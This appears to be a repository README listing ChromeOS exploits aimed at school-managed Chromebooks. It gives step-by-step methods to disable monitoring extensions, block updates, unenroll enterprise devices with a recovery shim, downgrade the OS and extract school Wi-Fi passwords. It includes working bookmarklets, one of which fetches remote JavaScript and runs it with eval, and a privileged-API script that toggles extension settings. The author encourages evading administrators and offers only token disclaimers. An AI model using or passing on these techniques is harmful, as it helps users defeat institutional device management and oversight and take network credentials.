This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destory your computer if used inproperly. So PLEASE PLEASE make sure you follow these instructions very carefully! If you need help ask it here
ATTENTION ALL SYS ADMINS!!!
Hello, I am Echo and I created this repo in order to give exploits for the masses and to prove one thing, chromebooks are literal trash, and a poor excuse for a computer. They are full of exploits, you might think you blocked/patched them all but then 3 more pop up. It is a endless game of wack-a-mole. Treat your students to a windows computer, they will thank you. And don't you dare start to think "My school district does not have that kind of money", it most likely does! How much are you paying the blocker companies? Think about that.
New Point-Blank (Run scripts on extension pages)
This exploit allows you to run scripts, on extensions pages, this is a great example of how Chromebooks are a piece of garbage.Scroll down to preform this exploit!
Getting started (Note: if bookmarklets are blocked your screwed.)
- Go to here (on your school chromebook of course)
- Make a bookmark with the code there.
- Once that is done. If you have Securly go to here if it says blocked by chrome, reload(you have to actually have securly ofc) If you have iBoss go to here,
If you have Cisco Umbrella go to here If you have Blocksi go to here And if you have GoGuardian(might not work) go to here. Now most of these links are a block page(this is intentional) on each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made and click either hard disable or soft disable, you can also run some of the scripts and run your own code, your extension may disable javascript being ran on it, so running your own code may not work. Extra notes
- I recommend doing soft disable, which only disables it until restart.
- The launcher was made by me, but the idea was from Bypassi#7037
- If your school updated GoGuardian, this exploit may not work.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
CAUB (Prevent Updates)
This exploit keeps your chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your chromebook that the wifi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.Scroll down to preform this exploit!
Getting started
- Go to
chrome://network#state(on your school chromebook of course; if this is blocked then ur kinda screwed lol). - Scroll to the bottom of the page; you should see a list of "favorite" wifis that you've connected to in the past.
- Click the + sign next to the wifi name of each network that you commonly connect your chromebook to.
- The more wifis you expand, the better, but note that they have to come from the "favorites" section.
- Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
- Go to caub.glitch.me.
- Paste the copied text into the textbox below.
- Press the "generate onc" button below the textbox.
- Once you have downloaded the file, go to chrome://network#general
- Click on the "import onc" button
- Import the newly downloaded file
Extra notes
- Your chromebook will no longer automatically update. (as long as you are on a wifi that you used caub on)
- Be careful not to stay on a wifi for too long without using caub on it, otherwise you might update.
- We cannot guarantee that this will work on every wifi
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
LTBEEF (Disable extensions)
LTBEEF is an exploit, created by Bypassi#7037, which abuses api endpoints within the google chrome webstore.Please Note: This exploit only works on versions below 106, and eariler versions of 102
The origional site created for this exploit can be found at ltbeef.netlify.app
Instlation
There are several vesions of thisexploit you can use, here are the 2 most common versions:
-
Bookmarklets
To use a GUI, bookmark one of the below scripts:- Ingot
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
- Compact Cow's UI
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable. Simple!
Photos of the GUI's:
-
DNS servers
By changing your DNS server, you can use LTBEEF, even if bookmarklets are blocked.First, go to Settings > Network > Wifi > Network, and click on "Custom Name Servers"
Set every box there to the following ip:
158.101.114.159(Hosted by The Greatest Giant#0110)
Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
Point Blank (Run code on system pages)
Point Blank is an exploit that allows you to run bookmarklets on privilaged pages, sutch as the chrome extentions page. This exploit was also found by Bypassi, you can read more about how he discovered this exploit- Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);- Navigate to
chrome://extensions - Click on a extension that YOU installed from the Chrome Web Store > Details
- In the URL bar, copy the string of letters and numbers after the
/?id= - Click "View in Chrome Web Store" and spam the excape key. If it loads into chrome webstore try again, if it is a blank screen click the bookmarklet
- Paste the id of the extension into the prompt. If you close the tab, the exploit will stop working.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
SH1mmer (Unenroll and more)
SH1mmer is an exploit devloped by the crew at Mercury Workshop. Credits can be found within the menu and on their site. This exploit can be used to completely unenroll enterprise-managed Chromebooks.PLEASE FOLLOW EVERY DIRECTION! If you do not, you could brick your chromebook.
More info: https://sh1mmer.me/
- FAQ: https://sh1mmer.me/faq.html
- Credits: https://sh1mmer.me/faq.html
This exploit works quite like downgrading, but requires a few more steps.
Requirements
- A USB with atleast 16gbs
- A personal computer
Setup
- Navigate to chrome://version on the chromebook you with to downgrade and check for your board under "Platform" (ex I have a c3100 and it's board is stable-channel octopus)
- Make sure your board is in this list:
brask, brya, clapper, coral, dedede, enguarde, glimmer, grunt, hana, hatch, jacuzzi, kukui, nami, octopus, orco, pyro, reks, sentry, stout, strongbad, tidus, ultima, volteer, zorkIf it is not, then this exploit will not work. - On your personal computer, download the corresponding shim from the SH1MMER file mirror pick crew if you are not advanced
- Install Chromebook Recovery Utility onto your personal computer (found at https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en
- Open the extention, and click on the settings button in to top right hand corner, click "use local image"
- Select the .bin file you downloaded
- Click the blue button
- Wait
Instlation
- Enter recovery mode on your Managed Chromebook. This is done by pressing the power button, reload key (↻), and esc key at the same time. Your screens should look like the image below:
- Press ctrl+d, then enter
- It will now say something about "returning to secure mode" or that "OS verification is off", this means ou are ready to boot Sh1mmer. It will look the like the images below:
- Press the power button, reload key (↻), and esc key at the same time again.
- Plug your shimmed USB into your Chromebook, and press the power button, reload key (↻), and esc key again.
- Navigate to "Payloads", then click on "Unenroll"
- Nagigate back to the pain page, and click "Reboot"
Enjoy your new, unenrolled chromebook!
Please use this only when you have permisson, I (3kh0) and Mercury Workshop do not condone the use of this exploit for illegal purposes!
Downgrading (Change versions)
Downgrading can be used for several exploits, to get to a version that does not have patches for sertain exploits, sutch as LTBEEF. This is a built in feature of ChromeOS.Requirements
- A USB thumb drive with at least 4gb of storage, some board have small or bigger images, so have a beef usb, I recommend 16gb
- A personal computer with access to downloading extentions
- A brain
Setup
- Navigate to chrome://version on the chromebook you with to downgrade and check for your board under "Platform" (ex I have a c3100 and it's board is stable-channel octopus)
Instlation
- Install Chromebook Recovery Utility onto your personal computer (found at https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en
- Open the extention, and click on the settings button in to top right hand corner, click "use local image"
- Select the recovery image you downloaded from chrome100
- Plug in the USB you wish to use, and follow the prompts on the screen
- On your chromebook, press esc+reload+power and follow the prompts
- On the checking for updates screen, press ctrl+shift+e to skip the "checking for updates" screen
- Profit
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
Killcurly
Kill extension, by signing out.- Visit chrome://settings/signOut the O in Out must be capital.
- Press the blue button
- Go to chrome://restart
- Everything should be unblocked
Using this, may get your computer taken away if your school finds out. This was discoverered by zoroark Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
Wifi Password (Get school wifi passwords)
You can get your school's wifi password if it is built into the enrolement!This tool should not be used for illegal activity. By using this tool, you acknowledge that you are legally allowed to extract the password(s) in question.
- Visit chrome://net-export
- In "OPTIONS" set "Include raw bytes"
- Click "Start Logging to Disk"
- Visit chrome://policy
- Click "Reload policies"
- Go back to chrome://net-export and click "Stop logging"
- Upload file here!
- Profit
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
boop